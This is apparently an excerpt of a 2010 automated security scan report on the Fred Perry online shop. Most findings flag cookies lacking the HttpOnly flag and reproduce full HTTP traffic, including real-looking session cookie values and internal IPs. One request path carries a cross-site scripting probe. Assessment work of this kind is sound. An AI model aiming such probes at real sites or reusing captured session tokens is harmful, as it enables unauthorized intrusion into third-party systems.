body{font:13px/1.5 Helvetica,Arial,'Liberation Sans',FreeSans,sans-serif}a:focus{outline:1px dotted invert}hr{border-color:#ccc;border-style:solid;border-width:1px 0 0;clear:both;height:0}h1{font-size
...[SNIP]...

6.85. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/payment.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/payment.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c7a-110d5-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 69845
Content-Type: text/css

.main
{
   margin-top:20px;
}

.col-right
{
   border:none;
   padding:0;
   width:220px;
   margin: 0 10px 0 0;
}

/*========================================================================================
Geo
...[SNIP]...

6.86. http://www.fredperry.com/skin/frontend/default/default/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/print.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c7b-3c3-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 963
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...

6.87. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skin/frontend/default/default/css/styles.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 20 Jul 2009 14:59:34 GMT
ETag: "d10bde-6ed6-46f2462cdc180"
Accept-Ranges: bytes
Content-Length: 28374
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...

6.88. http://www.fredperry.com/women/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vp0e2ebg17qng0r6lsu7deo761; expires=Tue, 09-Nov-2010 16:58:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women -
...[SNIP]...

6.89. http://www.fredperry.com/women/amy-winehouse-landing/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/amy-winehouse-landing/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f2qme8ik93v80c0uh2u97enl87; expires=Tue, 09-Nov-2010 17:02:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...

6.90. http://www.fredperry.com/women/amy-winehouse/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/amy-winehouse/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5m3n4pf5hgotrsrisqoo3lqfn7; expires=Tue, 09-Nov-2010 17:02:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...

6.91. http://www.fredperry.com/women/dresses/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:59:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ghl3l93cleoaniplj3c9jh79i2; expires=Tue, 09-Nov-2010 16:59:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.92. http://www.fredperry.com/women/jackets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:59:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1tc04bkc2hlrd4dceh3lvor110; expires=Tue, 09-Nov-2010 16:59:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.93. http://www.fredperry.com/women/knitwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qtliepkaml0tamcrk9r6572tv0; expires=Tue, 09-Nov-2010 16:58:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.94. http://www.fredperry.com/women/shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=en3r5n3vla0t9qkn6s946k66q0; expires=Tue, 09-Nov-2010 16:58:27 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.95. http://www.fredperry.com/women/skirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=37diu21bbf4t91j6m1irukgmj2; expires=Tue, 09-Nov-2010 17:00:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.96. http://www.fredperry.com/women/t-shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

frontend

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r0ingtq1nnq9o6t0ej5sg1k446; expires=Tue, 09-Nov-2010 17:02:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...

6.97. http://www.fredperry.com/women/tennis/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b531gmhlf84dvds064rq7h6c02; expires=Tue, 09-Nov-2010 17:02:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...

6.98. http://www.fredperry.com/women/trousers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=944u4ceosrum7jtm71mur7ee34; expires=Tue, 09-Nov-2010 17:02:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Trouser
...[SNIP]...

6.99. http://www.fredperry.com/women/woven-shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /women/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bhv7o2v67ugejb11m7s4mgb3b1; expires=Tue, 09-Nov-2010 17:02:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...

6.100. https://www.fredperry.com/customer/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 302 Found
Date: Tue, 09 Nov 2010 16:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d2mk5crl1cvamj39pbaqgfbh74; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://www.fredperry.com/customer/account/login/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


6.101. https://www.fredperry.com/customer/account/login/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...

6.102. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/ HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 18:36:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e1t1bajii7coiqcugmfaqqj404; expires=Tue, 09-Nov-2010 19:36:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...

6.103. https://www.fredperry.com/sales/order/history/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

